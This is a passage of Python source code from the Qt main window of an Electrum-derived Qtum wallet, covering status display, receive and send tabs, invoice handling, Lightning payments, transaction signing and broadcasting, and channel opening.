"_fork" if len(self.network.get_blockchains()) > 1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) elif server_lag < (-1): text = _("Synchronizing headers...") icon = read_QIcon("status_waiting.png") else: c, u, x = self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) if self.wallet.has_lightning(): l = self.wallet.lnworker.get_balance() text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: icon = read_QIcon("status_disconnected.png") if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) elif self.network.downloading_headers: text = _("Downloading headers...") icon = read_QIcon("status_waiting.png") else: text = _("Not connected") if self.tray: self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) if self.status_button: self.status_button.setIcon(icon) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.token_balance_list.update() self.token_hist_model.refresh('update_tabs') self.token_hist_list.update() self.smart_contract_list.update() self.delegation_list.update() self.channels_list.update_rows.emit(wallet) self.update_completions() def create_channels_tab(self): self.channels_list = ChannelsList(self) t = self.channels_list.get_toolbar() return self.create_list_tab(self.channels_list, t) def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) tab = self.create_list_tab(l, toolbar) toolbar_shown = bool(self.config.get('show_toolbar_history', False)) l.show_toolbar(toolbar_shown) return tab def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_channel(self, channel_id): from . import channel_details channel_details.ChannelDetailsDialog(self, channel_id).show() def show_transaction(self, tx, *, tx_desc=None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, parent=self, desc=tx_desc) def show_lightning_transaction(self, tx_item): from .lightning_tx_dialog import LightningTxDialog d = LightningTxDialog(self, tx_item) d.show() def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 0, 0) grid.addWidget(self.receive_message_e, 0, 1, 1, 4) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 1, 0) grid.addWidget(self.receive_amount_e, 1, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.connect_fields(self, self.amount_e, self.fiat_send_e, None) self.expires_combo = QComboBox() evl = sorted(pr_expiration_values.items()) evl_keys = [i[0] for i in evl] evl_values = [i[1] for i in evl] default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING) try: i = evl_keys.index(default_expiry) except ValueError: i = 0 self.expires_combo.addItems(evl_values) self.expires_combo.setCurrentIndex(i) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) def on_expiry(i): self.config.set_key('request_expiry', evl_keys[i]) self.expires_combo.currentIndexChanged.connect(on_expiry) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding Qtum addresses.'), _('The qtum address never expires and will always be part of this electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0) grid.addWidget(self.expires_combo, 2, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 2, 1) self.clear_invoice_button = QPushButton(_('Clear')) self.clear_invoice_button.clicked.connect(self.clear_receive_tab) self.create_invoice_button = QPushButton(_('New Address')) self.create_invoice_button.setIcon(read_QIcon("qtum.png")) self.create_invoice_button.setToolTip('Create on-chain request') self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_invoice_button) buttons.addWidget(self.create_invoice_button) if self.wallet.has_lightning(): self.create_invoice_button.setText(_('New Address')) self.create_lightning_invoice_button = QPushButton(_('Lightning')) self.create_lightning_invoice_button.setToolTip('Create lightning request') self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png")) self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True)) buttons.addWidget(self.create_lightning_invoice_button) grid.addLayout(buttons, 4, 3, 1, 2) self.receive_payreq_e = ButtonsTextEdit() self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT)) self.receive_payreq_e.addCopyButton(self.app) self.receive_payreq_e.setReadOnly(True) self.receive_payreq_e.textChanged.connect(self.update_receive_qr) self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus) self.receive_qr = QRCodeWidget(fixedSize=220) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_address_e = ButtonsTextEdit() self.receive_address_e.setFont(QFont(MONOSPACE_FONT)) self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self) qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png" self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code")) self.receive_requests_label = QLabel(_('Incoming payments')) from .request_list import RequestList self.request_list = RequestList(self) receive_tabs = QTabWidget() receive_tabs.addTab(self.receive_address_e, _('Address')) receive_tabs.addTab(self.receive_payreq_e, _('Request')) receive_tabs.addTab(self.receive_qr, _('QR Code')) receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0)) receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i)) receive_tabs_sp = receive_tabs.sizePolicy() receive_tabs_sp.setRetainSizeWhenHidden(True) receive_tabs.setSizePolicy(receive_tabs_sp) def maybe_hide_receive_tabs(): receive_tabs.setVisible(bool(self.receive_payreq_e.text())) self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs) maybe_hide_receive_tabs() # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addStretch() hbox.addWidget(receive_tabs) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_requests(self, keys): for key in keys: self.wallet.delete_request(key) self.request_list.update() self.clear_receive_tab() def delete_lightning_payreq(self, payreq_key): self.wallet.lnworker.delete_invoice(payreq_key) self.request_list.update() self.invoice_list.update() self.clear_receive_tab() def sign_payment_request(self, addr): alias = self.config.get('alias') if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(repr(e)) return else: return def create_invoice(self, is_lightning): amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING) if is_lightning: if not self.wallet.lnworker.channels: self.show_error(_("You need to open a Lightning channel first.")) return # TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy) key = self.wallet.lnworker.add_request(amount, message, expiry) else: key = self.create_bitcoin_request(amount, message, expiry) if not key: return self.address_list.update() assert key is not None self.request_list.update() self.request_list.select_key(key) # clear request fields self.receive_amount_e.setText('') self.receive_message_e.setText('') # copy to clipboard r = self.wallet.get_request(key) content = r.invoice if r.is_lightning() else r.get_address() title = _('Invoice') if is_lightning else _('Address') self.do_copy(content, title=title) def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]: addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): # imported wallet msg = [ _('No more addresses in your wallet.'), ' ', _('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ', _('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n', _('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'), ] if not self.question(''.join(msg)): return addr = self.wallet.get_receiving_address() else: # deterministic wallet if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + repr(e)) else: self.sign_payment_request(addr) return addr def do_copy(self, content: str, *, title: str = None) -> None: self.app.clipboard().setText(content) if title is None: tooltip_text = _("Text copied to clipboard").format(title) else: tooltip_text = _("{} copied to clipboard").format(title) QToolTip.showText(QCursor.pos(), tooltip_text, self) def clear_receive_tab(self): self.receive_payreq_e.setText('') self.receive_address_e.setText('') self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() self.request_list.clearSelection() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def update_receive_qr(self): uri = str(self.receive_payreq_e.text()) if maybe_extract_bolt11_invoice(uri): # encode lightning invoices as uppercase so QR encoding can use # alphanumeric mode; resulting in smaller QR codes uri = uri.upper() self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if is_address(addr) and self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) self.payto_e.addPasteButton(self.app) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Qtum address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Qtum address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = FreezableLineEdit() self.message_e.setMinimumWidth(700) grid.addWidget(self.message_e, 2, 1, 1, -1) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 3, 0) grid.addWidget(self.amount_e, 3, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 3, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(100) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 3, 3) self.save_button = EnterButton(_("Save"), self.do_save_invoice) self.send_button = EnterButton(_("Pay") + "...", self.do_pay) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.save_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 4) self.amount_e.shortcut.connect(self.spend_max) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() #self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) self.set_onchain(False) self.invoices_label = QLabel(_('Outgoing payments')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) hbox.addStretch(1) w = QWidget() vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return outputs = self.payto_e.get_outputs(True) if not outputs: return make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=self.get_coins(), outputs=outputs, fee=fee_est, is_sweep=False) try: try: tx = make_tx(None) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. tx = make_tx(0) except (MultipleSpendMaxTxOutputs, NotEnoughFunds) as e: self.max_button.setChecked(False) self.show_error(str(e)) return self.max_button.setChecked(True) amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) # show tooltip explaining max amount mining_fee = tx.get_fee() mining_fee_str = self.format_amount_and_units(mining_fee) msg = _("Mining fee: {} (can be adjusted on next screen)").format(mining_fee_str) if x_fee_amount: twofactor_fee_str = self.format_amount_and_units(x_fee_amount) msg += "\n" + _("2fa fee: {} (for the next batch of transactions)").format(twofactor_fee_str) frozen_bal = self.get_frozen_balance_str() if frozen_bal: msg += "\n" + _("Some coins are frozen: {} (can be unfrozen in the Addresses or in the Coins tab)").format(frozen_bal) QToolTip.showText(self.max_button.mapToGlobal(QPoint(0, 0)), msg) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) @protected def protect(self, func, args, password): return func(*args, password) def read_outputs(self) -> List[PartialTxOutput]: if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) return outputs def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.scriptpubkey is None: self.show_error(_('Qtum Address is None')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def check_send_tab_payto_line_and_show_errors(self) -> bool: """Returns whether there are errors. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: if len(errors) == 1 and not errors[0].is_multiline: err = errors[0] self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" + f"{err.line_content[:40]}...\n\n" f"{err.exc!r}") else: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})" for err in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True return False # no errors def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]): if amount_msat is None: raise Exception("missing amount for LN invoice") amount_sat = Decimal(amount_msat) / 1000 # FIXME this is currently lying to user as we truncate to satoshis msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat)) if not self.question(msg): return self.save_pending_invoice() def task(): coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) return fut.result() self.wallet.thread.add(task) def on_request_status(self, wallet, key, status): if wallet != self.wallet: return req = self.wallet.receive_requests.get(key) if req is None: return if status == PR_PAID: self.notify(_('Payment received') + '\n' + key) self.need_update.set() else: self.request_list.update_item(key, req) def on_invoice_status(self, wallet, key): if wallet != self.wallet: return invoice = self.wallet.get_invoice(key) if invoice is None: return status = self.wallet.get_invoice_status(invoice) if status == PR_PAID: self.invoice_list.update() else: self.invoice_list.update_item(key, invoice) def on_payment_succeeded(self, wallet, key): description = self.wallet.get_label(key) self.notify(_('Payment succeeded') + '\n\n' + description) self.need_update.set() def on_payment_failed(self, wallet, key, reason): self.show_error(_('Payment failed') + '\n\n' + reason) def read_invoice(self): if self.check_send_tab_payto_line_and_show_errors(): return if not self._is_onchain: invoice_str = self.payto_e.lightning_invoice if not invoice_str: return if not self.wallet.has_lightning(): self.show_error(_('Lightning is disabled')) return invoice = LNInvoice.from_bech32(invoice_str) if invoice.get_amount_msat() is None: amount_sat = self.amount_e.get_amount() if amount_sat: invoice.amount_msat = int(amount_sat * 1000) else: self.show_error(_('No amount')) return return invoice else: outputs = self.read_outputs() if self.check_send_tab_onchain_outputs_and_show_errors(outputs): return message = self.message_e.text() return self.wallet.create_invoice( outputs=outputs, message=message, pr=self.payment_request, URI=self.payto_URI) def do_save_invoice(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.save_pending_invoice() def save_pending_invoice(self): if not self.pending_invoice: return self.do_clear() self.wallet.save_invoice(self.pending_invoice) self.invoice_list.update() self.pending_invoice = None def do_pay(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.do_pay_invoice(self.pending_invoice) def pay_multiple_invoices(self, invoices): outputs = [] for invoice in invoices: outputs += invoice.outputs self.pay_onchain_dialog(self.get_coins(), outputs) def do_pay_invoice(self, invoice: 'Invoice'): if invoice.type == PR_TYPE_LN: assert isinstance(invoice, LNInvoice) self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat()) elif invoice.type == PR_TYPE_ONCHAIN: assert isinstance(invoice, OnchainInvoice) self.pay_onchain_dialog(self.get_coins(), invoice.outputs) else: raise Exception('unknown invoice type') def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]: coins = self.get_manually_selected_coins() if coins is not None: return coins else: return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only) def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]: """Return a list of selected coins or None. Note: None means selection is not being used, while an empty sequence means the user specifically selected that. """ return self.utxo_list.get_spend_list() def get_text_not_enough_funds_mentioning_frozen(self) -> str: text = _("Not enough funds") frozen_str = self.get_frozen_balance_str() if frozen_str: text += " ({} {})".format( frozen_str, _("are frozen") ) return text def get_frozen_balance_str(self) -> Optional[str]: frozen_bal = sum(self.wallet.get_frozen_balance()) if not frozen_bal: return None return self.format_amount_and_units(frozen_bal) def pay_onchain_dialog( self, inputs: Sequence[PartialTxInput], outputs: List[PartialTxOutput], *, external_keypairs=None) -> None: # trustedcoin requires this if run_hook('abort_send', self): return is_sweep = bool(external_keypairs) make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=inputs, outputs=outputs, fee=fee_est, is_sweep=is_sweep) output_values = [x.value for x in outputs] if output_values.count('!') > 1: self.show_error(_("More than one output set to spend max")) return output_value = '!' if '!' in output_values else sum(output_values) conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep) if conf_dlg.not_enough_funds: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. if not conf_dlg.have_enough_funds_assuming_zero_fees(): text = self.get_text_not_enough_funds_mentioning_frozen() self.show_message(text) return # shortcut to advanced preview (after "enough funds" check!) if self.config.get('advanced_preview'): preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs) preview_dlg.show() return cancelled, is_send, password, tx = conf_dlg.run() if cancelled: return if is_send: self.save_pending_invoice() def sign_done(success): if success: self.broadcast_or_show(tx) self.sign_tx_with_password(tx, callback=sign_done, password=password, external_keypairs=external_keypairs) else: preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs) preview_dlg.show() def preview_tx_dialog(self, *, make_tx, external_keypairs=None): d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs, window=self) d.show() def broadcast_or_show(self, tx: Transaction, * , broadcast_done=None): if tx is None: self.show_error("tx is None") return if not tx.is_complete(): self.show_transaction(tx) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) self.show_transaction(tx) return self.broadcast_transaction(tx) if broadcast_done: broadcast_done(tx) @protected def sign_tx(self, tx, *, callback, external_keypairs, password): self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs) def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if external_keypairs: # can sign directly task = partial(tx.sign, external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx: Transaction): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Invoice has expired") try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: return False, e.get_message_for_gui() except BestEffortRequestFailed as e: return False, repr(e) # success txid = tx.txid() if pr: self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}") return True, txid # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: success, msg = result if success: parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def mktx_for_open_channel(self, funding_sat): coins = self.get_coins(nonlocal_only=True) make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins, funding_sat=funding_sat, fee_est=fee_est) return make_tx def open_channel(self, connect_str, funding_sat, push_amt): try: extract_nodeid(connect_str) except ConnStringFormatError as e: self.main_window.show_error(str(e)) return # use ConfirmTxDialog # we need to know the fee before we broadcast, because the txid is required make_tx = self.mktx_for_open_channel(funding_sat) d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False) # disable preview button because the user must not broadcast tx before establishment_flow d.preview_button.setEnabled(False) cancelled, is_send, password, funding_tx = d.run() if not is_send: return if cancelled: return # read funding_sat from tx; converts '!' to int value funding_sat = funding_tx.output_value_for_address(ln_dummy_address()) def task(): return self.wallet.lnworker.open_channel(connect_str=connect_str, funding_tx=funding_tx, funding_sat=funding_sat, push_amt_sat=push_amt, password=password) def on_success(args): chan, funding_tx = args n = chan.constraints.funding_txn_minimum_depth message = '\n'.join([ _('Channel established.'), _('Remote peer ID') + ':' + chan.node_id.hex(), _('This channel will be usable after {} confirmations').format(n) ]) if not funding_tx.is_complete(): message += '\n\n' + _('Please sign and broadcast the funding transaction') self.show_message(message) if not funding_tx.is_complete(): self.show_transaction(funding_tx) def on_failure(exc_info): type_, e, traceback = exc_info self.show_error(_('Could not open channel: {}').format(repr(e))) WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b: bool) -> None: self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoices(self, keys): for key in keys: self.wallet.delete_invoice(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = pr.get_id() invoice = self.wallet.get_invoice(key) if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setAmount(pr.get_amount()) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(str(pr.error)) self.payment_request = None self.do_clear() def on_pr(self, request: 'paymentrequest.PaymentRequest'): self.set_onchain(True) self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def parse_lightning_invoice(self, invoice): """Parse ln invoice, and prepare the send tab for it.""" try: lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP) except Exception as e: raise LnDecodeException(e) from e pubkey = lnaddr.pubkey.serialize().hex() for k,v in lnaddr.tags: if k == 'd': description = v break else: description = '' self.payto_e.setFrozen(True) self.payto_e.setText(pubkey) self.message_e.setText(description) if lnaddr.get_amount_sat() is not None: self.amount_e.setAmount(lnaddr.get_amount_sat()) #self.amount_e.textEdited.emit("") self.set_onchain(False) def set_onchain(self, b): self._is_onchain = b self.max_button.setEnabled(b) def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() self.payto_URI = out r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.payment_request = None self.payto_URI = None self.payto_e.is_pr = False self.set_onchain(False) for e in [self.payto_e, self.message_e, self.amount_e]: e.setText('') e.setFrozen(False) self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool): self.wallet.set_frozen_state_of_coins(utxos, freeze) self.utxo_list.update() def create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) #vbox.setContentsMargins(0, 0, 0, 0) #vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = 